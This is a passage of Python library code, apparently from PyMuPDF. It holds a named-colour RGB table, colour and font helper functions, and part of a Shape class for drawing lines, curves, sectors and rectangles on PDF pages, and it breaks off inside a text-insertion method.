("GRAY39", 99, 99, 99),
("GRAY4", 10, 10, 10),
("GRAY40", 102, 102, 102),
("GRAY41", 105, 105, 105),
("GRAY42", 107, 107, 107),
("GRAY43", 110, 110, 110),
("GRAY44", 112, 112, 112),
("GRAY45", 115, 115, 115),
("GRAY46", 117, 117, 117),
("GRAY47", 120, 120, 120),
("GRAY48", 122, 122, 122),
("GRAY49", 125, 125, 125),
("GRAY5", 13, 13, 13),
("GRAY50", 127, 127, 127),
("GRAY51", 130, 130, 130),
("GRAY52", 133, 133, 133),
("GRAY53", 135, 135, 135),
("GRAY54", 138, 138, 138),
("GRAY55", 140, 140, 140),
("GRAY56", 143, 143, 143),
("GRAY57", 145, 145, 145),
("GRAY58", 148, 148, 148),
("GRAY59", 150, 150, 150),
("GRAY6", 15, 15, 15),
("GRAY60", 153, 153, 153),
("GRAY61", 156, 156, 156),
("GRAY62", 158, 158, 158),
("GRAY63", 161, 161, 161),
("GRAY64", 163, 163, 163),
("GRAY65", 166, 166, 166),
("GRAY66", 168, 168, 168),
("GRAY67", 171, 171, 171),
("GRAY68", 173, 173, 173),
("GRAY69", 176, 176, 176),
("GRAY7", 18, 18, 18),
("GRAY70", 179, 179, 179),
("GRAY71", 181, 181, 181),
("GRAY72", 184, 184, 184),
("GRAY73", 186, 186, 186),
("GRAY74", 189, 189, 189),
("GRAY75", 191, 191, 191),
("GRAY76", 194, 194, 194),
("GRAY77", 196, 196, 196),
("GRAY78", 199, 199, 199),
("GRAY79", 201, 201, 201),
("GRAY8", 20, 20, 20),
("GRAY80", 204, 204, 204),
("GRAY81", 207, 207, 207),
("GRAY82", 209, 209, 209),
("GRAY83", 212, 212, 212),
("GRAY84", 214, 214, 214),
("GRAY85", 217, 217, 217),
("GRAY86", 219, 219, 219),
("GRAY87", 222, 222, 222),
("GRAY88", 224, 224, 224),
("GRAY89", 227, 227, 227),
("GRAY9", 23, 23, 23),
("GRAY90", 229, 229, 229),
("GRAY91", 232, 232, 232),
("GRAY92", 235, 235, 235),
("GRAY93", 237, 237, 237),
("GRAY94", 240, 240, 240),
("GRAY95", 242, 242, 242),
("GRAY96", 245, 245, 245),
("GRAY97", 247, 247, 247),
("GRAY98", 250, 250, 250),
("GRAY99", 252, 252, 252),
("HONEYDEW", 240, 255, 240),
("HONEYDEW1", 240, 255, 240),
("HONEYDEW2", 224, 238, 224),
("HONEYDEW3", 193, 205, 193),
("HONEYDEW4", 131, 139, 131),
("HOTPINK", 255, 105, 180),
("HOTPINK1", 255, 110, 180),
("HOTPINK2", 238, 106, 167),
("HOTPINK3", 205, 96, 144),
("HOTPINK4", 139, 58, 98),
("INDIANRED", 205, 92, 92),
("INDIANRED1", 255, 106, 106),
("INDIANRED2", 238, 99, 99),
("INDIANRED3", 205, 85, 85),
("INDIANRED4", 139, 58, 58),
("IVORY", 255, 255, 240),
("IVORY1", 255, 255, 240),
("IVORY2", 238, 238, 224),
("IVORY3", 205, 205, 193),
("IVORY4", 139, 139, 131),
("KHAKI", 240, 230, 140),
("KHAKI1", 255, 246, 143),
("KHAKI2", 238, 230, 133),
("KHAKI3", 205, 198, 115),
("KHAKI4", 139, 134, 78),
("LAVENDER", 230, 230, 250),
("LAVENDERBLUSH", 255, 240, 245),
("LAVENDERBLUSH1", 255, 240, 245),
("LAVENDERBLUSH2", 238, 224, 229),
("LAVENDERBLUSH3", 205, 193, 197),
("LAVENDERBLUSH4", 139, 131, 134),
("LAWNGREEN", 124, 252, 0),
("LEMONCHIFFON", 255, 250, 205),
("LEMONCHIFFON1", 255, 250, 205),
("LEMONCHIFFON2", 238, 233, 191),
("LEMONCHIFFON3", 205, 201, 165),
("LEMONCHIFFON4", 139, 137, 112),
("LIGHTBLUE", 173, 216, 230),
("LIGHTBLUE1", 191, 239, 255),
("LIGHTBLUE2", 178, 223, 238),
("LIGHTBLUE3", 154, 192, 205),
("LIGHTBLUE4", 104, 131, 139),
("LIGHTCORAL", 240, 128, 128),
("LIGHTCYAN", 224, 255, 255),
("LIGHTCYAN1", 224, 255, 255),
("LIGHTCYAN2", 209, 238, 238),
("LIGHTCYAN3", 180, 205, 205),
("LIGHTCYAN4", 122, 139, 139),
("LIGHTGOLDENROD", 238, 221, 130),
("LIGHTGOLDENROD1", 255, 236, 139),
("LIGHTGOLDENROD2", 238, 220, 130),
("LIGHTGOLDENROD3", 205, 190, 112),
("LIGHTGOLDENROD4", 139, 129, 76),
("LIGHTGOLDENRODYELLOW", 250, 250, 210),
("LIGHTGREEN", 144, 238, 144),
("LIGHTGRAY", 211, 211, 211),
("LIGHTPINK", 255, 182, 193),
("LIGHTPINK1", 255, 174, 185),
("LIGHTPINK2", 238, 162, 173),
("LIGHTPINK3", 205, 140, 149),
("LIGHTPINK4", 139, 95, 101),
("LIGHTSALMON", 255, 160, 122),
("LIGHTSALMON1", 255, 160, 122),
("LIGHTSALMON2", 238, 149, 114),
("LIGHTSALMON3", 205, 129, 98),
("LIGHTSALMON4", 139, 87, 66),
("LIGHTSEAGREEN", 32, 178, 170),
("LIGHTSKYBLUE", 135, 206, 250),
("LIGHTSKYBLUE1", 176, 226, 255),
("LIGHTSKYBLUE2", 164, 211, 238),
("LIGHTSKYBLUE3", 141, 182, 205),
("LIGHTSKYBLUE4", 96, 123, 139),
("LIGHTSLATEBLUE", 132, 112, 255),
("LIGHTSLATEGRAY", 119, 136, 153),
("LIGHTSTEELBLUE", 176, 196, 222),
("LIGHTSTEELBLUE1", 202, 225, 255),
("LIGHTSTEELBLUE2", 188, 210, 238),
("LIGHTSTEELBLUE3", 162, 181, 205),
("LIGHTSTEELBLUE4", 110, 123, 139),
("LIGHTYELLOW", 255, 255, 224),
("LIGHTYELLOW1", 255, 255, 224),
("LIGHTYELLOW2", 238, 238, 209),
("LIGHTYELLOW3", 205, 205, 180),
("LIGHTYELLOW4", 139, 139, 122),
("LIMEGREEN", 50, 205, 50),
("LINEN", 250, 240, 230),
("MAGENTA", 255, 0, 255),
("MAGENTA1", 255, 0, 255),
("MAGENTA2", 238, 0, 238),
("MAGENTA3", 205, 0, 205),
("MAGENTA4", 139, 0, 139),
("MAROON", 176, 48, 96),
("MAROON1", 255, 52, 179),
("MAROON2", 238, 48, 167),
("MAROON3", 205, 41, 144),
("MAROON4", 139, 28, 98),
("MEDIUMAQUAMARINE", 102, 205, 170),
("MEDIUMBLUE", 0, 0, 205),
("MEDIUMORCHID", 186, 85, 211),
("MEDIUMORCHID1", 224, 102, 255),
("MEDIUMORCHID2", 209, 95, 238),
("MEDIUMORCHID3", 180, 82, 205),
("MEDIUMORCHID4", 122, 55, 139),
("MEDIUMPURPLE", 147, 112, 219),
("MEDIUMPURPLE1", 171, 130, 255),
("MEDIUMPURPLE2", 159, 121, 238),
("MEDIUMPURPLE3", 137, 104, 205),
("MEDIUMPURPLE4", 93, 71, 139),
("MEDIUMSEAGREEN", 60, 179, 113),
("MEDIUMSLATEBLUE", 123, 104, 238),
("MEDIUMSPRINGGREEN", 0, 250, 154),
("MEDIUMTURQUOISE", 72, 209, 204),
("MEDIUMVIOLETRED", 199, 21, 133),
("MIDNIGHTBLUE", 25, 25, 112),
("MINTCREAM", 245, 255, 250),
("MISTYROSE", 255, 228, 225),
("MISTYROSE1", 255, 228, 225),
("MISTYROSE2", 238, 213, 210),
("MISTYROSE3", 205, 183, 181),
("MISTYROSE4", 139, 125, 123),
("MOCCASIN", 255, 228, 181),
("MUPDFBLUE", 37, 114, 172),
("NAVAJOWHITE", 255, 222, 173),
("NAVAJOWHITE1", 255, 222, 173),
("NAVAJOWHITE2", 238, 207, 161),
("NAVAJOWHITE3", 205, 179, 139),
("NAVAJOWHITE4", 139, 121, 94),
("NAVY", 0, 0, 128),
("NAVYBLUE", 0, 0, 128),
("OLDLACE", 253, 245, 230),
("OLIVEDRAB", 107, 142, 35),
("OLIVEDRAB1", 192, 255, 62),
("OLIVEDRAB2", 179, 238, 58),
("OLIVEDRAB3", 154, 205, 50),
("OLIVEDRAB4", 105, 139, 34),
("ORANGE", 255, 165, 0),
("ORANGE1", 255, 165, 0),
("ORANGE2", 238, 154, 0),
("ORANGE3", 205, 133, 0),
("ORANGE4", 139, 90, 0),
("ORANGERED", 255, 69, 0),
("ORANGERED1", 255, 69, 0),
("ORANGERED2", 238, 64, 0),
("ORANGERED3", 205, 55, 0),
("ORANGERED4", 139, 37, 0),
("ORCHID", 218, 112, 214),
("ORCHID1", 255, 131, 250),
("ORCHID2", 238, 122, 233),
("ORCHID3", 205, 105, 201),
("ORCHID4", 139, 71, 137),
("PALEGOLDENROD", 238, 232, 170),
("PALEGREEN", 152, 251, 152),
("PALEGREEN1", 154, 255, 154),
("PALEGREEN2", 144, 238, 144),
("PALEGREEN3", 124, 205, 124),
("PALEGREEN4", 84, 139, 84),
("PALETURQUOISE", 175, 238, 238),
("PALETURQUOISE1", 187, 255, 255),
("PALETURQUOISE2", 174, 238, 238),
("PALETURQUOISE3", 150, 205, 205),
("PALETURQUOISE4", 102, 139, 139),
("PALEVIOLETRED", 219, 112, 147),
("PALEVIOLETRED1", 255, 130, 171),
("PALEVIOLETRED2", 238, 121, 159),
("PALEVIOLETRED3", 205, 104, 137),
("PALEVIOLETRED4", 139, 71, 93),
("PAPAYAWHIP", 255, 239, 213),
("PEACHPUFF", 255, 218, 185),
("PEACHPUFF1", 255, 218, 185),
("PEACHPUFF2", 238, 203, 173),
("PEACHPUFF3", 205, 175, 149),
("PEACHPUFF4", 139, 119, 101),
("PERU", 205, 133, 63),
("PINK", 255, 192, 203),
("PINK1", 255, 181, 197),
("PINK2", 238, 169, 184),
("PINK3", 205, 145, 158),
("PINK4", 139, 99, 108),
("PLUM", 221, 160, 221),
("PLUM1", 255, 187, 255),
("PLUM2", 238, 174, 238),
("PLUM3", 205, 150, 205),
("PLUM4", 139, 102, 139),
("POWDERBLUE", 176, 224, 230),
("PURPLE", 160, 32, 240),
("PURPLE1", 155, 48, 255),
("PURPLE2", 145, 44, 238),
("PURPLE3", 125, 38, 205),
("PURPLE4", 85, 26, 139),
("PY_COLOR", 240, 255, 210),
("RED", 255, 0, 0),
("RED1", 255, 0, 0),
("RED2", 238, 0, 0),
("RED3", 205, 0, 0),
("RED4", 139, 0, 0),
("ROSYBROWN", 188, 143, 143),
("ROSYBROWN1", 255, 193, 193),
("ROSYBROWN2", 238, 180, 180),
("ROSYBROWN3", 205, 155, 155),
("ROSYBROWN4", 139, 105, 105),
("ROYALBLUE", 65, 105, 225),
("ROYALBLUE1", 72, 118, 255),
("ROYALBLUE2", 67, 110, 238),
("ROYALBLUE3", 58, 95, 205),
("ROYALBLUE4", 39, 64, 139),
("SADDLEBROWN", 139, 69, 19),
("SALMON", 250, 128, 114),
("SALMON1", 255, 140, 105),
("SALMON2", 238, 130, 98),
("SALMON3", 205, 112, 84),
("SALMON4", 139, 76, 57),
("SANDYBROWN", 244, 164, 96),
("SEAGREEN", 46, 139, 87),
("SEAGREEN1", 84, 255, 159),
("SEAGREEN2", 78, 238, 148),
("SEAGREEN3", 67, 205, 128),
("SEAGREEN4", 46, 139, 87),
("SEASHELL", 255, 245, 238),
("SEASHELL1", 255, 245, 238),
("SEASHELL2", 238, 229, 222),
("SEASHELL3", 205, 197, 191),
("SEASHELL4", 139, 134, 130),
("SIENNA", 160, 82, 45),
("SIENNA1", 255, 130, 71),
("SIENNA2", 238, 121, 66),
("SIENNA3", 205, 104, 57),
("SIENNA4", 139, 71, 38),
("SKYBLUE", 135, 206, 235),
("SKYBLUE1", 135, 206, 255),
("SKYBLUE2", 126, 192, 238),
("SKYBLUE3", 108, 166, 205),
("SKYBLUE4", 74, 112, 139),
("SLATEBLUE", 106, 90, 205),
("SLATEBLUE1", 131, 111, 255),
("SLATEBLUE2", 122, 103, 238),
("SLATEBLUE3", 105, 89, 205),
("SLATEBLUE4", 71, 60, 139),
("SLATEGRAY", 112, 128, 144),
("SNOW", 255, 250, 250),
("SNOW1", 255, 250, 250),
("SNOW2", 238, 233, 233),
("SNOW3", 205, 201, 201),
("SNOW4", 139, 137, 137),
("SPRINGGREEN", 0, 255, 127),
("SPRINGGREEN1", 0, 255, 127),
("SPRINGGREEN2", 0, 238, 118),
("SPRINGGREEN3", 0, 205, 102),
("SPRINGGREEN4", 0, 139, 69),
("STEELBLUE", 70, 130, 180),
("STEELBLUE1", 99, 184, 255),
("STEELBLUE2", 92, 172, 238),
("STEELBLUE3", 79, 148, 205),
("STEELBLUE4", 54, 100, 139),
("TAN", 210, 180, 140),
("TAN1", 255, 165, 79),
("TAN2", 238, 154, 73),
("TAN3", 205, 133, 63),
("TAN4", 139, 90, 43),
("THISTLE", 216, 191, 216),
("THISTLE1", 255, 225, 255),
("THISTLE2", 238, 210, 238),
("THISTLE3", 205, 181, 205),
("THISTLE4", 139, 123, 139),
("TOMATO", 255, 99, 71),
("TOMATO1", 255, 99, 71),
("TOMATO2", 238, 92, 66),
("TOMATO3", 205, 79, 57),
("TOMATO4", 139, 54, 38),
("TURQUOISE", 64, 224, 208),
("TURQUOISE1", 0, 245, 255),
("TURQUOISE2", 0, 229, 238),
("TURQUOISE3", 0, 197, 205),
("TURQUOISE4", 0, 134, 139),
("VIOLET", 238, 130, 238),
("VIOLETRED", 208, 32, 144),
("VIOLETRED1", 255, 62, 150),
("VIOLETRED2", 238, 58, 140),
("VIOLETRED3", 205, 50, 120),
("VIOLETRED4", 139, 34, 82),
("WHEAT", 245, 222, 179),
("WHEAT1", 255, 231, 186),
("WHEAT2", 238, 216, 174),
("WHEAT3", 205, 186, 150),
("WHEAT4", 139, 126, 102),
("WHITE", 255, 255, 255),
("WHITESMOKE", 245, 245, 245),
("YELLOW", 255, 255, 0),
("YELLOW1", 255, 255, 0),
("YELLOW2", 238, 238, 0),
("YELLOW3", 205, 205, 0),
("YELLOW4", 139, 139, 0),
("YELLOWGREEN", 154, 205, 50),
]
def getColorInfoDict() -> dict:
d = {}
for item in getColorInfoList():
d[item[0].lower()] = item[1:]
return d
def getColor(name: str) -> tuple:
"""Retrieve RGB color in PDF format by name.
Returns:
a triple of floats in range 0 to 1. In case of name-not-found, "white" is returned.
"""
try:
c = getColorInfoList()[getColorList().index(name.upper())]
return (c[1] / 255.0, c[2] / 255.0, c[3] / 255.0)
except:
return (1, 1, 1)
def getColorHSV(name: str) -> tuple:
"""Retrieve the hue, saturation, value triple of a color name.
Returns:
a triple (degree, percent, percent). If not found (-1, -1, -1) is returned.
"""
try:
x = getColorInfoList()[getColorList().index(name.upper())]
except:
return (-1, -1, -1)
r = x[1] / 255.0
g = x[2] / 255.0
b = x[3] / 255.0
cmax = max(r, g, b)
V = round(cmax * 100, 1)
cmin = min(r, g, b)
delta = cmax - cmin
if delta == 0:
hue = 0
elif cmax == r:
hue = 60.0 * (((g - b) / delta) % 6)
elif cmax == g:
hue = 60.0 * (((b - r) / delta) + 2)
else:
hue = 60.0 * (((r - g) / delta) + 4)
H = int(round(hue))
if cmax == 0:
sat = 0
else:
sat = delta / cmax
S = int(round(sat * 100))
return (H, S, V)
def _get_font_properties(doc: Document, xref: int) -> tuple:
fontname, ext, stype, buffer = doc.extract_font(xref)
asc = 0.8
dsc = -0.2
if ext == "":
return fontname, ext, stype, asc, dsc
if buffer:
try:
font = Font(fontbuffer=buffer)
asc = font.ascender
dsc = font.descender
bbox = font.bbox
if asc - dsc < 1:
if bbox.y0 < dsc:
dsc = bbox.y0
asc = 1 - dsc
except:
asc *= 1.2
dsc *= 1.2
return fontname, ext, stype, asc, dsc
if ext != "n/a":
try:
font = Font(fontname)
asc = font.ascender
dsc = font.descender
except:
asc *= 1.2
dsc *= 1.2
else:
asc *= 1.2
dsc *= 1.2
return fontname, ext, stype, asc, dsc
def get_char_widths(
doc: Document, xref: int, limit: int = 256, idx: int = 0, fontdict: OptDict = None
) -> list:
"""Get list of glyph information of a font.
Notes:
Must be provided by its XREF number. If we already dealt with the
font, it will be recorded in doc.FontInfos. Otherwise we insert an
entry there.
Finally we return the glyphs for the font. This is a list of
(glyph, width) where glyph is an integer controlling the char
appearance, and width is a float controlling the char's spacing:
width * fontsize is the actual space.
For 'simple' fonts, glyph == ord(char) will usually be true.
Exceptions are 'Symbol' and 'ZapfDingbats'. We are providing data for these directly here.
"""
fontinfo = CheckFontInfo(doc, xref)
if fontinfo is None: # not recorded yet: create it
if fontdict is None:
name, ext, stype, asc, dsc = _get_font_properties(doc, xref)
fontdict = {
"name": name,
"type": stype,
"ext": ext,
"ascender": asc,
"descender": dsc,
}
else:
name = fontdict["name"]
ext = fontdict["ext"]
stype = fontdict["type"]
ordering = fontdict["ordering"]
simple = fontdict["simple"]
if ext == "":
raise ValueError("xref is not a font")
# check for 'simple' fonts
if stype in ("Type1", "MMType1", "TrueType"):
simple = True
else:
simple = False
# check for CJK fonts
if name in ("Fangti", "Ming"):
ordering = 0
elif name in ("Heiti", "Song"):
ordering = 1
elif name in ("Gothic", "Mincho"):
ordering = 2
elif name in ("Dotum", "Batang"):
ordering = 3
else:
ordering = -1
fontdict["simple"] = simple
if name == "ZapfDingbats":
glyphs = zapf_glyphs
elif name == "Symbol":
glyphs = symbol_glyphs
else:
glyphs = None
fontdict["glyphs"] = glyphs
fontdict["ordering"] = ordering
fontinfo = [xref, fontdict]
doc.FontInfos.append(fontinfo)
else:
fontdict = fontinfo[1]
glyphs = fontdict["glyphs"]
simple = fontdict["simple"]
ordering = fontdict["ordering"]
if glyphs is None:
oldlimit = 0
else:
oldlimit = len(glyphs)
mylimit = max(256, limit)
if mylimit <= oldlimit:
return glyphs
if ordering < 0: # not a CJK font
glyphs = doc._get_char_widths(
xref, fontdict["name"], fontdict["ext"], fontdict["ordering"], mylimit, idx
)
else: # CJK fonts use char codes and width = 1
glyphs = None
fontdict["glyphs"] = glyphs
fontinfo[1] = fontdict
UpdateFontInfo(doc, fontinfo)
return glyphs
class Shape(object):
"""Create a new shape."""
@staticmethod
def horizontal_angle(C, P):
"""Return the angle to the horizontal for the connection from C to P.
This uses the arcus sine function and resolves its inherent ambiguity by
looking up in which quadrant vector S = P - C is located.
"""
S = Point(P - C).unit # unit vector 'C' -> 'P'
alfa = math.asin(abs(S.y)) # absolute angle from horizontal
if S.x < 0: # make arcsin result unique
if S.y <= 0: # bottom-left
alfa = -(math.pi - alfa)
else: # top-left
alfa = math.pi - alfa
else:
if S.y >= 0: # top-right
pass
else: # bottom-right
alfa = -alfa
return alfa
def __init__(self, page: Page):
CheckParent(page)
self.page = page
self.doc = page.parent
if not self.doc.is_pdf:
raise ValueError("is no PDF")
self.height = page.mediabox_size.y
self.width = page.mediabox_size.x
self.x = page.cropbox_position.x
self.y = page.cropbox_position.y
self.pctm = page.transformation_matrix # page transf. matrix
self.ipctm = ~self.pctm # inverted transf. matrix
self.draw_cont = ""
self.text_cont = ""
self.totalcont = ""
self.lastPoint = None
self.rect = None
def updateRect(self, x):
if self.rect is None:
if len(x) == 2:
self.rect = Rect(x, x)
else:
self.rect = Rect(x)
else:
if len(x) == 2:
x = Point(x)
self.rect.x0 = min(self.rect.x0, x.x)
self.rect.y0 = min(self.rect.y0, x.y)
self.rect.x1 = max(self.rect.x1, x.x)
self.rect.y1 = max(self.rect.y1, x.y)
else:
x = Rect(x)
self.rect.x0 = min(self.rect.x0, x.x0)
self.rect.y0 = min(self.rect.y0, x.y0)
self.rect.x1 = max(self.rect.x1, x.x1)
self.rect.y1 = max(self.rect.y1, x.y1)
def draw_line(self, p1: point_like, p2: point_like) -> Point:
"""Draw a line between two points."""
p1 = Point(p1)
p2 = Point(p2)
if not (self.lastPoint == p1):
self.draw_cont += "%g %g m\n" % JM_TUPLE(p1 * self.ipctm)
self.lastPoint = p1
self.updateRect(p1)
self.draw_cont += "%g %g l\n" % JM_TUPLE(p2 * self.ipctm)
self.updateRect(p2)
self.lastPoint = p2
return self.lastPoint
def draw_polyline(self, points: list) -> Point:
"""Draw several connected line segments."""
for i, p in enumerate(points):
if i == 0:
if not (self.lastPoint == Point(p)):
self.draw_cont += "%g %g m\n" % JM_TUPLE(Point(p) * self.ipctm)
self.lastPoint = Point(p)
else:
self.draw_cont += "%g %g l\n" % JM_TUPLE(Point(p) * self.ipctm)
self.updateRect(p)
self.lastPoint = Point(points[-1])
return self.lastPoint
def draw_bezier(
self,
p1: point_like,
p2: point_like,
p3: point_like,
p4: point_like,
) -> Point:
"""Draw a standard cubic Bezier curve."""
p1 = Point(p1)
p2 = Point(p2)
p3 = Point(p3)
p4 = Point(p4)
if not (self.lastPoint == p1):
self.draw_cont += "%g %g m\n" % JM_TUPLE(p1 * self.ipctm)
self.draw_cont += "%g %g %g %g %g %g c\n" % JM_TUPLE(
list(p2 * self.ipctm) + list(p3 * self.ipctm) + list(p4 * self.ipctm)
)
self.updateRect(p1)
self.updateRect(p2)
self.updateRect(p3)
self.updateRect(p4)
self.lastPoint = p4
return self.lastPoint
def draw_oval(self, tetra: typing.Union[quad_like, rect_like]) -> Point:
"""Draw an ellipse inside a tetrapod."""
if len(tetra) != 4:
raise ValueError("invalid arg length")
if hasattr(tetra[0], "__float__"):
q = Rect(tetra).quad
else:
q = Quad(tetra)
mt = q.ul + (q.ur - q.ul) * 0.5
mr = q.ur + (q.lr - q.ur) * 0.5
mb = q.ll + (q.lr - q.ll) * 0.5
ml = q.ul + (q.ll - q.ul) * 0.5
if not (self.lastPoint == ml):
self.draw_cont += "%g %g m\n" % JM_TUPLE(ml * self.ipctm)
self.lastPoint = ml
self.draw_curve(ml, q.ll, mb)
self.draw_curve(mb, q.lr, mr)
self.draw_curve(mr, q.ur, mt)
self.draw_curve(mt, q.ul, ml)
self.updateRect(q.rect)
self.lastPoint = ml
return self.lastPoint
def draw_circle(self, center: point_like, radius: float) -> Point:
"""Draw a circle given its center and radius."""
if not radius > EPSILON:
raise ValueError("radius must be positive")
center = Point(center)
p1 = center - (radius, 0)
return self.draw_sector(center, p1, 360, fullSector=False)
def draw_curve(
self,
p1: point_like,
p2: point_like,
p3: point_like,
) -> Point:
"""Draw a curve between points using one control point."""
kappa = 0.55228474983
p1 = Point(p1)
p2 = Point(p2)
p3 = Point(p3)
k1 = p1 + (p2 - p1) * kappa
k2 = p3 + (p2 - p3) * kappa
return self.draw_bezier(p1, k1, k2, p3)
def draw_sector(
self,
center: point_like,
point: point_like,
beta: float,
fullSector: bool = True,
) -> Point:
"""Draw a circle sector."""
center = Point(center)
point = Point(point)
l3 = "%g %g m\n"
l4 = "%g %g %g %g %g %g c\n"
l5 = "%g %g l\n"
betar = math.radians(-beta)
w360 = math.radians(math.copysign(360, betar)) * (-1)
w90 = math.radians(math.copysign(90, betar))
w45 = w90 / 2
while abs(betar) > 2 * math.pi:
betar += w360 # bring angle below 360 degrees
if not (self.lastPoint == point):
self.draw_cont += l3 % JM_TUPLE(point * self.ipctm)
self.lastPoint = point
Q = Point(0, 0) # just make sure it exists
C = center
P = point
S = P - C # vector 'center' -> 'point'
rad = abs(S) # circle radius
if not rad > EPSILON:
raise ValueError("radius must be positive")
alfa = self.horizontal_angle(center, point)
while abs(betar) > abs(w90): # draw 90 degree arcs
q1 = C.x + math.cos(alfa + w90) * rad
q2 = C.y + math.sin(alfa + w90) * rad
Q = Point(q1, q2) # the arc's end point
r1 = C.x + math.cos(alfa + w45) * rad / math.cos(w45)
r2 = C.y + math.sin(alfa + w45) * rad / math.cos(w45)
R = Point(r1, r2) # crossing point of tangents
kappah = (1 - math.cos(w45)) * 4 / 3 / abs(R - Q)
kappa = kappah * abs(P - Q)
cp1 = P + (R - P) * kappa # control point 1
cp2 = Q + (R - Q) * kappa # control point 2
self.draw_cont += l4 % JM_TUPLE(
list(cp1 * self.ipctm) + list(cp2 * self.ipctm) + list(Q * self.ipctm)
)
betar -= w90 # reduce parm angle by 90 deg
alfa += w90 # advance start angle by 90 deg
P = Q # advance to arc end point
# draw (remaining) arc
if abs(betar) > 1e-3: # significant degrees left?
beta2 = betar / 2
q1 = C.x + math.cos(alfa + betar) * rad
q2 = C.y + math.sin(alfa + betar) * rad
Q = Point(q1, q2) # the arc's end point
r1 = C.x + math.cos(alfa + beta2) * rad / math.cos(beta2)
r2 = C.y + math.sin(alfa + beta2) * rad / math.cos(beta2)
R = Point(r1, r2) # crossing point of tangents
# kappa height is 4/3 of segment height
kappah = (1 - math.cos(beta2)) * 4 / 3 / abs(R - Q) # kappa height
kappa = kappah * abs(P - Q) / (1 - math.cos(betar))
cp1 = P + (R - P) * kappa # control point 1
cp2 = Q + (R - Q) * kappa # control point 2
self.draw_cont += l4 % JM_TUPLE(
list(cp1 * self.ipctm) + list(cp2 * self.ipctm) + list(Q * self.ipctm)
)
if fullSector:
self.draw_cont += l3 % JM_TUPLE(point * self.ipctm)
self.draw_cont += l5 % JM_TUPLE(center * self.ipctm)
self.draw_cont += l5 % JM_TUPLE(Q * self.ipctm)
self.lastPoint = Q
return self.lastPoint
def draw_rect(self, rect: rect_like, *, radius=None) -> Point:
"""Draw a rectangle.
Args:
radius: if not None, the rectangle will have rounded corners.
This is the radius of the curvature, given as percentage of
the rectangle width or height. Valid are values 0 < v <= 0.5.
For a sequence of two values, the corners will have different
radii. Otherwise, the percentage will be computed from the
shorter side. A value of (0.5, 0.5) will draw an ellipse.
"""
r = Rect(rect)
if radius == None: # standard rectangle
self.draw_cont += "%g %g %g %g re\n" % JM_TUPLE(
list(r.bl * self.ipctm) + [r.width, r.height]
)
self.updateRect(r)
self.lastPoint = r.tl
return self.lastPoint
# rounded corners requested. This requires 1 or 2 values, each
# with 0 < value <= 0.5
if hasattr(radius, "__float__"):
if radius <= 0 or radius > 0.5:
raise ValueError(f"bad radius value {radius}.")
d = min(r.width, r.height) * radius
px = (d, 0)
py = (0, d)
elif hasattr(radius, "__len__") and len(radius) == 2:
rx, ry = radius
px = (rx * r.width, 0)
py = (0, ry * r.height)
if min(rx, ry) <= 0 or max(rx, ry) > 0.5:
raise ValueError(f"bad radius value {radius}.")
else:
raise ValueError(f"bad radius value {radius}.")
lp = self.draw_line(r.tl + py, r.bl - py)
lp = self.draw_curve(lp, r.bl, r.bl + px)
lp = self.draw_line(lp, r.br - px)
lp = self.draw_curve(lp, r.br, r.br - py)
lp = self.draw_line(lp, r.tr + py)
lp = self.draw_curve(lp, r.tr, r.tr - px)
lp = self.draw_line(lp, r.tl + px)
self.lastPoint = self.draw_curve(lp, r.tl, r.tl + py)
self.updateRect(r)
return self.lastPoint
def draw_quad(self, quad: quad_like) -> Point:
"""Draw a Quad."""
q = Quad(quad)
return self.draw_polyline([q.ul, q.ll, q.lr, q.ur, q.ul])
def draw_zigzag(
self,
p1: point_like,
p2: point_like,
breadth: float = 2,
) -> Point:
"""Draw a zig-zagged line from p1 to p2."""
p1 = Point(p1)
p2 = Point(p2)
S = p2 - p1 # vector start - end
rad = abs(S) # distance of points
cnt = 4 * int(round(rad / (4 * breadth), 0)) # always take full phases
if cnt < 4:
raise ValueError("points too close")
mb = rad / cnt # revised breadth
matrix = Matrix(util_hor_matrix(p1, p2)) # normalize line to x-axis
i_mat = ~matrix # get original position
points = [] # stores edges
for i in range(1, cnt):
if i % 4 == 1: # point "above" connection
p = Point(i, -1) * mb
elif i % 4 == 3: # point "below" connection
p = Point(i, 1) * mb
else: # ignore others
continue
points.append(p * i_mat)
self.draw_polyline([p1] + points + [p2]) # add start and end points
return p2
def draw_squiggle(
self,
p1: point_like,
p2: point_like,
breadth=2,
) -> Point:
"""Draw a squiggly line from p1 to p2."""
p1 = Point(p1)
p2 = Point(p2)
S = p2 - p1 # vector start - end
rad = abs(S) # distance of points
cnt = 4 * int(round(rad / (4 * breadth), 0)) # always take full phases
if cnt < 4:
raise ValueError("points too close")
mb = rad / cnt # revised breadth
matrix = Matrix(util_hor_matrix(p1, p2)) # normalize line to x-axis
i_mat = ~matrix # get original position
k = 2.4142135623765633 # y of draw_curve helper point
points = [] # stores edges
for i in range(1, cnt):
if i % 4 == 1: # point "above" connection
p = Point(i, -k) * mb
elif i % 4 == 3: # point "below" connection
p = Point(i, k) * mb
else: # else on connection line
p = Point(i, 0) * mb
points.append(p * i_mat)
points = [p1] + points + [p2]
cnt = len(points)
i = 0
while i + 2 < cnt:
self.draw_curve(points[i], points[i + 1], points[i + 2])
i += 2
return p2
# ==============================================================================
# Shape.insert_text
# ==============================================================================
def insert_text(
self,
point: point_like,
buffer: typing.Union[str, list],
fontsize: float = 11,
lineheight: OptFloat = None,
fontname: str = "helv",
fontfile: OptStr = None,
set_simple: bool = 0,
encoding: int = 0,
color: OptSeq = None,
fill: OptSeq = None,
render_mode: int = 0,
border_width: float = 0.05,
rotate: int = 0,
morph: OptSeq = None,
stroke_opacity: float = 1,
fill_opacity: float = 1,
oc: int = 0,
) -> int:
# ensure 'text' is a list of strings, worth dealing with
if not bool(buffer):
return 0
if type(buffer) not in (list, tuple):
text = buffer.splitlines()
else:
text = buffer
if not len(text) > 0:
return 0
point = Point(point)
try:
maxcode = max([ord(c) for c in " ".join(text)])
except:
return 0
# ensure valid 'fontname'
fname = fontname
if fname.startswith("/"):
fname = fname[1:]
xref = self.page.insert_font(
fontname=fname, fontfile=fontfile, encoding=encoding, set_simple=set_simple
)
fontinfo = CheckFontInfo(self.doc, xref)
fontdict = fontinfo[1]
ordering = fontdict["ordering"]
simple = fontdict["simple"]
bfname = fontdict["name"]
ascender = fontdict["ascender"]
descender = fontdict["descender"]
if lineheight:
lheight = fontsize * lineheight
elif ascender - descender <= 1:
lheight = fontsize * 1.2
else:
lheight = fontsize * (ascender - descender)
if maxcode > 255:
glyphs = self.doc.get_char_widths(xref, maxcode + 1)
else:
glyphs = fontdict["glyphs"]
tab = []
for t in text:
if simple and bfname not in ("Symbol", "ZapfDingbats"):
g = None
else:
g = glyphs
